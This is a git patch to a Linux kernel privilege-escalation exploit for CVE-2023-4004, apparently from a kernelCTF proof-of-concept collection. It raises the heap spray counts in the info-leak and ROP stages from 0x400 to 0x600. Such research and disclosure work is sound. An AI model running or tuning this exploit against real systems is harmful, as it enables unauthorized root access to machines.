From cc583e8f9d0fa005f1a1a17f937a7164859cdde5 Mon Sep 17 00:00:00 2001
From: lonial con <kongln9170@gmail.com>
Date: Tue, 12 Sep 2023 19:17:03 +0800
Subject: [PATCH] Change cos exploit

---
 .../exploit/cos-105-17412.101.17/exploit.c                | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit.c b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit.c
index 3f254b06..9c01fc7f 100644
--- a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit.c
+++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit.c
@@ -204,11 +204,11 @@ int leak_info(struct nl_sock * socket){
     new_setelem(socket,SET_TABLE,set_name,a,0x88+3);
     elem_flush(socket,SET_TABLE,set_name);
     puts("Start spray tables");
-    spray_tables(socket,0x400, a, 0xd8);
+    spray_tables(socket,0x600, a, 0xd8);
     puts("Finish spray tables");
     elem_flush(socket,SET_TABLE,set_name);
     puts("Start spray objects");
-    spray_objects(socket, 0x400);
+    spray_objects(socket, 0x600);
     puts("Finish spray objects");
     
     nl_socket_modify_cb(socket,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_find_target_table, NULL);
@@ -283,11 +283,11 @@ int jump_to_rop(struct nl_sock * socket){
     elem_flush(socket,SET_TABLE,set_name);
     
     puts("Start spray tables");
-    spray_tables(socket,0x400, a, 0xd8);
+    spray_tables(socket,0x600, a, 0xd8);
     puts("Finish spray tables");
     elem_flush(socket,SET_TABLE,set_name);
     puts("Start spray objects");
-    spray_objects_with_udata(socket, 0x400, ops, 0x100);
+    spray_objects_with_udata(socket, 0x600, ops, 0x100);
     puts("Finish spray objects");
 
     nl_socket_modify_cb(socket,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_find_target_table, NULL);